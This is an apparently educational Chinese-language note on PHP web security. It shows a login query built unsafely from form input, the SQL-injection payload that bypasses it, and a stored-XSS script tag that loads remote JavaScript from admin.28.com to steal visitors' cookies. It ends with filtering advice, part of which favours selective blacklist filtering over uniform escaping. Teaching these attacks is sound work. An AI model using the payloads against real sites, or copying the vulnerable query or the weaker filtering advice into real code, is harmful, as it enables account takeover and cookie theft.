1.SQL注入:(如果是这样写的话)
$username=$_POST['username'];
$password=md5($_POST['password']);
$sql="SELECT * FROM user WHERE username='$username' AND password='$password'";
表单传来的用户名是 1' or 1#,那么放到SQL语句后,就变成了(#表示注释,把后面的注释掉了,那么这样网站就被注入了):$sql="SELECT * FROM user WHERE username='1' or 1 # AND password='$password'";
所以,一般把上面的话变成两句话:先通过username查找,然后再比较password
2.XSS(跨站脚本攻击)
用户提交表单时如果表单中包含不规则的HTML代码或者JS代码的话,会影响页面的功能以及效果。
两种形式:a.html代码
这种攻击通过输入一个不规则的HTML代码导致页面乱了。
b.js攻击
可以偷访问这个网站的人的COOKIE数据。
这个JS可以把浏览器中的COOKIE发到admin.28.com(你本地的一个文件)上去
首先在评论框中写入一段js:(相当于在这个网站上挂了一段js代码abc.js)
<script src=http://admin.28.com/abc.js></script>
本地Abc.js这样写:(这样就可以把访问这个网站的用户的COOKIE发到本地文件中)
3.那么我们应该怎样做?
- 一定要在服务器上过滤,不要相信客户端
b. 不能使用htmlspecialchars函数统一过滤,我们要有选择性的过滤,只过滤掉字符串中有危险字符。
需要过滤的主要是:
- <script>中的内容(JS)
- 标签上的事件,如:<div onclick=”xxxx”>里的onclick事件等等。
我们可以自己写也可以使用网上现有的:
- tp框架中有一个函数:remove_xss
- 有一个开源产品:htmlpurifier
- 网上找些简单实用的